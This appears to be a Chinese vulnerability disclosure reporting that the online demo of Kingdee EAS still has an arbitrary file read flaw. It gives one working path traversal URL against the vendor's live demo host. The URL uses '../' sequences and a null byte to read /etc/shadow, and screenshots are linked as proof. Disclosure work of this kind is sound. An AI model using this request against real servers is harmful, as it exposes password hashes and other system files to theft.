### 简要描述:
学习了下http://www.wooyun.org/bugs/wooyun-2010-096179中讲的金蝶EAS任意文件读取,想找个环境试试,就在官网上的在线体验处试了试,没想到官网在线体验没有修复。。。。。。
### 详细说明:
http://easshow.kingdee.com:7896/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00
[<img src="https://images.seebug.org/upload/201507/1719501551accbf183db96e8de8d4a939107e8ec.png" alt="kgdeas.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/1719501551accbf183db96e8de8d4a939107e8ec.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201507/171950393d00490c58158ecce57a61f83574b494.png" alt="kgdeas.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/171950393d00490c58158ecce57a61f83574b494.png)
京公网安备 11010502034610号
暂无评论